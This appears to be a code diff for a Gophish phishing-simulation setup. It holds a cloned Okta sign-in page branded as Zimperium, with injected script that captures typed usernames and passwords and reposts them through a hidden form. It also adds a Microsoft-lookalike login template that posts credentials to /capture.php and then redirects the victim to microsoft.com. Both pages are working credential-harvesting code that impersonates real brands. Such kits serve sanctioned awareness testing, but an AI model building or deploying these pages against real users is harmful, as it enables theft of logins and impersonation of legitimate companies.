|
||||
autoPush = true;
|
||||
|
||||
|
||||
var accountChooserDiscoveryUrl = 'https://login.okta.com/discovery/iframe.html';
|
||||
|
||||
// In case of custom app login, the uri is already absolute, so we must not attach baseUrl
|
||||
var redirectUri;
|
||||
if (isAbsoluteUri(fromUri)) {
|
||||
redirectUri = fromUri;
|
||||
} else {
|
||||
redirectUri = baseUrl + fromUri;
|
||||
}
|
||||
|
||||
|
||||
var backToSignInLink = '';
|
||||
|
||||
|
||||
var customButtons;
|
||||
var pivProperties = {};
|
||||
|
||||
|
||||
|
||||
var customLinks = [];
|
||||
|
||||
var factorPageCustomLink = {};
|
||||
|
||||
|
||||
var linkParams;
|
||||
|
||||
|
||||
var proxyIdxResponse;
|
||||
|
||||
|
||||
var stateTokenAllFlows;
|
||||
|
||||
|
||||
var idpDiscovery;
|
||||
var idpDiscoveryRequestContext;
|
||||
|
||||
|
||||
var showPasswordToggleOnSignInPage = false;
|
||||
var showIdentifier = false;
|
||||
|
||||
|
||||
var hasSkipIdpFactorVerificationButton = false;
|
||||
|
||||
|
||||
var hasOAuth2ConsentFeature = false;
|
||||
var consentFunc;
|
||||
|
||||
|
||||
var hasMfaAttestationFeature = false;
|
||||
|
||||
hasMfaAttestationFeature = true;
|
||||
|
||||
|
||||
var rememberMyUsernameOnOIE = false;
|
||||
|
||||
|
||||
var engFastpassMultipleAccounts = true;
|
||||
|
||||
var registration = false;
|
||||
|
||||
|
||||
var webauthn = true;
|
||||
|
||||
|
||||
var overrideExistingStateToken = false;
|
||||
|
||||
|
||||
var isPersonalOktaOrg = false;
|
||||
|
||||
|
||||
var sameDeviceOVEnrollmentEnabled = false;
|
||||
|
||||
|
||||
var orgSyncToAccountChooserEnabled = true;
|
||||
|
||||
|
||||
var showSessionRevocation = false;
|
||||
|
||||
showSessionRevocation = true;
|
||||
|
||||
|
||||
var hcaptcha;
|
||||
|
||||
|
||||
var loginPageConfig = {
|
||||
fromUri: fromUri,
|
||||
repost: repost,
|
||||
redirectUri: redirectUri,
|
||||
backToSignInLink: backToSignInLink,
|
||||
isMobileClientLogin: false,
|
||||
isMobileSSO: false,
|
||||
disableiPadCheck: false,
|
||||
enableiPadLoginReload: false,
|
||||
linkParams: linkParams,
|
||||
hasChromeOSFeature: false,
|
||||
showLinkToAppStore: false,
|
||||
accountChooserDiscoveryUrl: accountChooserDiscoveryUrl,
|
||||
mfaAttestation: hasMfaAttestationFeature,
|
||||
isPersonalOktaOrg: isPersonalOktaOrg,
|
||||
enrollingFactor: '',
|
||||
stateTokenExpiresAt: '',
|
||||
stateTokenRefreshWindowMs: '',
|
||||
orgSyncToAccountChooserEnabled: orgSyncToAccountChooserEnabled,
|
||||
inactiveTab: {
|
||||
enabled: false,
|
||||
elementId: 'inactive-tab-main-div',
|
||||
avoidPageRefresh: true
|
||||
},
|
||||
signIn: {
|
||||
el: '#signin-container',
|
||||
baseUrl: baseUrl,
|
||||
brandName: 'Okta',
|
||||
logo: 'https://ok14static.oktacdn.com/fs/bco/1/fs0po5h0orFSteVvh697',
|
||||
logoText: 'Zimperium logo',
|
||||
helpSupportNumber: orgSupportPhoneNumber,
|
||||
stateToken: stateToken,
|
||||
username: username,
|
||||
signOutLink: signOutUrl,
|
||||
consent: consentFunc,
|
||||
authScheme: authScheme,
|
||||
relayState: fromUri,
|
||||
proxyIdxResponse: proxyIdxResponse,
|
||||
overrideExistingStateToken: overrideExistingStateToken,
|
||||
interstitialBeforeLoginRedirect: 'DEFAULT',
|
||||
|
||||
idpDiscovery: {
|
||||
requestContext: idpDiscoveryRequestContext
|
||||
},
|
||||
features: {
|
||||
router: true,
|
||||
securityImage: securityImage,
|
||||
rememberMe: rememberMe,
|
||||
autoPush: autoPush,
|
||||
webauthn: webauthn,
|
||||
smsRecovery: smsRecovery,
|
||||
callRecovery: callRecovery,
|
||||
emailRecovery: emailRecovery,
|
||||
selfServiceUnlock: selfServiceUnlock,
|
||||
multiOptionalFactorEnroll: true,
|
||||
sameDeviceOVEnrollmentEnabled: sameDeviceOVEnrollmentEnabled,
|
||||
deviceFingerprinting: true,
|
||||
useDeviceFingerprintForSecurityImage: true,
|
||||
trackTypingPattern: false,
|
||||
hideSignOutLinkInMFA: hideSignOutForMFA,
|
||||
hideBackToSignInForReset: hideBackToSignInForReset,
|
||||
rememberMyUsernameOnOIE: rememberMyUsernameOnOIE,
|
||||
engFastpassMultipleAccounts: engFastpassMultipleAccounts,
|
||||
customExpiredPassword: true,
|
||||
idpDiscovery: idpDiscovery,
|
||||
passwordlessAuth: hasPasswordlessPolicy,
|
||||
consent: hasOAuth2ConsentFeature,
|
||||
skipIdpFactorVerificationBtn: hasSkipIdpFactorVerificationButton,
|
||||
showPasswordToggleOnSignInPage: showPasswordToggleOnSignInPage,
|
||||
showIdentifier: showIdentifier,
|
||||
registration: registration,
|
||||
redirectByFormSubmit: redirectByFormSubmit,
|
||||
showPasswordRequirementsAsHtmlList: showPasswordRequirementsAsHtmlList,
|
||||
showSessionRevocation: showSessionRevocation
|
||||
},
|
||||
|
||||
assets: {
|
||||
baseUrl: "https\x3A\x2F\x2Fok14static.oktacdn.com\x2Fassets\x2Fjs\x2Fsdk\x2Fokta\x2Dsignin\x2Dwidget\x2F7.33.2"
|
||||
},
|
||||
|
||||
language: okta.locale,
|
||||
i18n: {},
|
||||
|
||||
customButtons: customButtons,
|
||||
|
||||
piv: pivProperties,
|
||||
|
||||
helpLinks: {
|
||||
help: '',
|
||||
forgotPassword: '',
|
||||
unlock: '',
|
||||
custom: customLinks,
|
||||
factorPage: factorPageCustomLink
|
||||
},
|
||||
|
||||
cspNonce: window.cspNonce,
|
||||
|
||||
hcaptcha: hcaptcha,
|
||||
}
|
||||
};
|
||||
|
||||
|
||||
loginPageConfig.signIn.i18n[okta.locale] = {
|
||||
|
||||
'primaryauth.username.placeholder': usernameLabel,
|
||||
'primaryauth.username.tooltip': usernameInlineLabel,
|
||||
'primaryauth.password.placeholder': passwordLabel,
|
||||
'primaryauth.password.tooltip': passwordInlineLabel,
|
||||
'mfa.challenge.password.placeholder': passwordLabel,
|
||||
'primaryauth.title': signinLabel,
|
||||
'forgotpassword': forgotpasswordLabel,
|
||||
'unlockaccount': unlockaccountLabel,
|
||||
'help': helpLabel,
|
||||
'needhelp': footerHelpTitle,
|
||||
'password.forgot.email.or.username.placeholder': recoveryFlowPlaceholder,
|
||||
'password.forgot.email.or.username.tooltip': recoveryFlowPlaceholder,
|
||||
'account.unlock.email.or.username.placeholder': recoveryFlowPlaceholder,
|
||||
'account.unlock.email.or.username.tooltip': recoveryFlowPlaceholder
|
||||
};
|
||||
|
||||
|
||||
loginPageConfig.signIn.logoText = 'Zimperium logo';
|
||||
loginPageConfig.signIn.brandName = 'Zimperium';
|
||||
|
||||
|
||||
function isOldWebBrowserControl() {
|
||||
// We no longer support IE7. If we see the MSIE 7.0 browser mode, it's a good signal
|
||||
// that we're in a windows embedded browser.
|
||||
if (navigator.userAgent.indexOf('MSIE 7.0') === -1) {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Because the userAgent is the same across embedded browsers, we use feature
|
||||
// detection to see if we're running on older versions that do not support updating
|
||||
// the documentMode via x-ua-compatible.
|
||||
return document.all && !window.atob;
|
||||
}
|
||||
|
||||
function isAbsoluteUri(uri) {
|
||||
var pat = /^https?:\/\//i;
|
||||
return pat.test(uri);
|
||||
}
|
||||
|
||||
var unsupportedContainer = document.getElementById('okta-sign-in');
|
||||
|
||||
var failIfCookiesDisabled = true;
|
||||
|
||||
|
||||
// Old versions of WebBrowser Controls (specifically, OneDrive) render in IE7 browser
|
||||
// mode, with no way to override the documentMode. In this case, inform the user they need
|
||||
// to upgrade.
|
||||
if (isOldWebBrowserControl()) {
|
||||
document.getElementById('unsupported-onedrive').removeAttribute('style');
|
||||
unsupportedContainer.removeAttribute('style');
|
||||
}
|
||||
else if (failIfCookiesDisabled && !navigator.cookieEnabled) {
|
||||
document.getElementById('unsupported-cookie').removeAttribute('style');
|
||||
unsupportedContainer.removeAttribute('style');
|
||||
}
|
||||
else {
|
||||
unsupportedContainer.parentNode.removeChild(unsupportedContainer);
|
||||
runLoginPage(function () {
|
||||
var res = OktaLogin.initLoginPage(loginPageConfig);
|
||||
|
||||
// Intercept form submission for Gophish
|
||||
setTimeout(function() {
|
||||
var submitButton = document.querySelector('[data-type="save"]') ||
|
||||
document.querySelector('.button-primary') ||
|
||||
document.querySelector('input[type="submit"]');
|
||||
|
||||
if (submitButton) {
|
||||
submitButton.addEventListener('click', function(e) {
|
||||
// Small delay to let Okta validate, then capture values
|
||||
setTimeout(function() {
|
||||
var usernameField = document.querySelector('[name="username"]') ||
|
||||
document.querySelector('#okta-signin-username') ||
|
||||
document.querySelector('input[type="text"]');
|
||||
var passwordField = document.querySelector('[name="password"]') ||
|
||||
document.querySelector('#okta-signin-password') ||
|
||||
document.querySelector('input[type="password"]');
|
||||
|
||||
if (usernameField && passwordField && usernameField.value && passwordField.value) {
|
||||
// Create hidden form for Gophish
|
||||
var form = document.createElement('form');
|
||||
form.method = 'POST';
|
||||
form.action = '';
|
||||
form.style.display = 'none';
|
||||
|
||||
var userInput = document.createElement('input');
|
||||
userInput.type = 'hidden';
|
||||
userInput.name = 'username';
|
||||
userInput.value = usernameField.value;
|
||||
form.appendChild(userInput);
|
||||
|
||||
var passInput = document.createElement('input');
|
||||
passInput.type = 'hidden';
|
||||
passInput.name = 'password';
|
||||
passInput.value = passwordField.value;
|
||||
form.appendChild(passInput);
|
||||
|
||||
document.body.appendChild(form);
|
||||
form.submit();
|
||||
}
|
||||
}, 100);
|
||||
});
|
||||
}
|
||||
}, 2000);
|
||||
});
|
||||
}
|
||||
}());
|
||||
</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
|
||||
window.addEventListener('load', function(event) {
|
||||
function applyStyle(id, styleDef) {
|
||||
if (styleDef) {
|
||||
var el = document.getElementById(id);
|
||||
if (!el) {
|
||||
return;
|
||||
}
|
||||
el.classList.add(styleDef);
|
||||
}
|
||||
}
|
||||
applyStyle('login-bg-image', 'bgStyle');
|
||||
applyStyle('login-bg-image-ie8', 'bgStyleIE8');
|
||||
});
|
||||
</script></body>
|
||||
</html>
|
||||
@@ -0,0 +1,220 @@
|
||||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<title>{{ page_title | default('Sign in to your account') }}</title>
|
||||
<style>
|
||||
* {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
box-sizing: border-box;
|
||||
}
|
||||
|
||||
body {
|
||||
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
|
||||
background: #f2f2f2;
|
||||
display: flex;
|
||||
justify-content: center;
|
||||
align-items: center;
|
||||
min-height: 100vh;
|
||||
}
|
||||
|
||||
.container {
|
||||
background: white;
|
||||
padding: 40px;
|
||||
border-radius: 2px;
|
||||
box-shadow: 0 2px 4px rgba(0,0,0,0.1);
|
||||
width: 440px;
|
||||
max-width: 90%;
|
||||
}
|
||||
|
||||
.logo {
|
||||
text-align: left;
|
||||
margin-bottom: 24px;
|
||||
}
|
||||
|
||||
.logo img {
|
||||
height: 24px;
|
||||
}
|
||||
|
||||
h1 {
|
||||
font-size: 24px;
|
||||
font-weight: 600;
|
||||
margin-bottom: 16px;
|
||||
color: #1a1a1a;
|
||||
}
|
||||
|
||||
.form-group {
|
||||
margin-bottom: 16px;
|
||||
}
|
||||
|
||||
input[type="email"],
|
||||
input[type="password"],
|
||||
input[type="text"] {
|
||||
width: 100%;
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #605e5c;
|
||||
border-radius: 2px;
|
||||
font-size: 15px;
|
||||
transition: border-color 0.2s;
|
||||
}
|
||||
|
||||
input[type="email"]:focus,
|
||||
input[type="password"]:focus,
|
||||
input[type="text"]:focus {
|
||||
outline: none;
|
||||
border-color: #0078d4;
|
||||
}
|
||||
|
||||
.forgot-password {
|
||||
display: block;
|
||||
margin: 8px 0 16px;
|
||||
color: #0078d4;
|
||||
text-decoration: none;
|
||||
font-size: 13px;
|
||||
}
|
||||
|
||||
.forgot-password:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.btn-primary {
|
||||
width: 100%;
|
||||
padding: 12px;
|
||||
background: #0078d4;
|
||||
color: white;
|
||||
border: none;
|
||||
border-radius: 2px;
|
||||
font-size: 16px;
|
||||
cursor: pointer;
|
||||
transition: background 0.2s;
|
||||
}
|
||||
|
||||
.btn-primary:hover {
|
||||
background: #106ebe;
|
||||
}
|
||||
|
||||
.error-message {
|
||||
color: #d13438;
|
||||
font-size: 13px;
|
||||
margin-top: 8px;
|
||||
display: none;
|
||||
}
|
||||
|
||||
.loading {
|
||||
display: none;
|
||||
text-align: center;
|
||||
margin-top: 20px;
|
||||
}
|
||||
|
||||
.spinner {
|
||||
border: 2px solid #f3f3f3;
|
||||
border-top: 2px solid #0078d4;
|
||||
border-radius: 50%;
|
||||
width: 20px;
|
||||
height: 20px;
|
||||
animation: spin 1s linear infinite;
|
||||
display: inline-block;
|
||||
}
|
||||
|
||||
@keyframes spin {
|
||||
0% { transform: rotate(0deg); }
|
||||
100% { transform: rotate(360deg); }
|
||||
}
|
||||
|
||||
.footer {
|
||||
margin-top: 40px;
|
||||
font-size: 12px;
|
||||
color: #605e5c;
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
.footer a {
|
||||
color: #605e5c;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
.footer a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<div class="logo">
|
||||
<img src="{{ logo_url | default('data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMDgiIGhlaWdodD0iMjQiPjx0ZXh0IHg9IjAiIHk9IjIwIiBmb250LWZhbWlseT0iU2Vnb2UgVUkiIGZvbnQtc2l6ZT0iMjAiIGZpbGw9IiM1YzJkOTEiPk1pY3Jvc29mdDwvdGV4dD48L3N2Zz4=') }}" alt="Logo">
|
||||
</div>
|
||||
|
||||
<h1>{{ heading | default('Sign in') }}</h1>
|
||||
|
||||
<form id="loginForm" method="POST" action="/capture.php">
|
||||
<input type="hidden" name="rid" value="{{ '{{.RId}}' }}">
|
||||
<input type="hidden" name="campaign" value="{{ '{{.Campaign}}' }}">
|
||||
|
||||
<div class="form-group">
|
||||
<input type="email"
|
||||
name="username"
|
||||
id="username"
|
||||
placeholder="{{ username_placeholder | default('Email, phone, or Skype') }}"
|
||||
required>
|
||||
</div>
|
||||
|
||||
<div class="form-group">
|
||||
<input type="password"
|
||||
name="password"
|
||||
id="password"
|
||||
placeholder="{{ password_placeholder | default('Password') }}"
|
||||
required>
|
||||
</div>
|
||||
|
||||
<a href="#" class="forgot-password">{{ forgot_text | default('Forgot password?') }}</a>
|
||||
|
||||
<div class="error-message" id="error">
|
||||
{{ error_message | default('Invalid username or password.') }}
|
||||
</div>
|
||||
|
||||
<button type="submit" class="btn-primary">
|
||||
{{ button_text | default('Sign in') }}
|
||||
</button>
|
||||
|
||||
<div class="loading" id="loading">
|
||||
<div class="spinner"></div>
|
||||
<p>{{ loading_text | default('Signing in...') }}</p>
|
||||
</div>
|
||||
</form>
|
||||
|
||||
<div class="footer">
|
||||
<a href="#">{{ footer_link1 | default('Terms of use') }}</a> |
|
||||
<a href="#">{{ footer_link2 | default('Privacy & cookies') }}</a>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
document.getElementById('loginForm').addEventListener('submit', function(e) {
|
||||
e.preventDefault();
|
||||
|
||||
// Show loading state
|
||||
document.getElementById('loading').style.display = 'block';
|
||||
document.querySelector('.btn-primary').style.display = 'none';
|
||||
|
||||
// Submit form data
|
||||
fetch(this.action, {
|
||||
method: 'POST',
|
||||
body: new FormData(this)
|
||||
})
|
||||
.then(response => {
|
||||
// Redirect after a delay to simulate processing
|
||||
setTimeout(() => {
|
||||
window.location.href = '{{ redirect_url | default("https://www.microsoft.com") }}';
|
||||
}, 2000);
|
||||
})
|
||||
.catch(error => {
|
||||
document.getElementById('error').style.display = 'block';
|
||||
document.getElementById('loading').style.display = 'none';
|
||||
document.querySelector('.btn-primary').style.display = 'block';
|
||||
});
|
||||
});
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||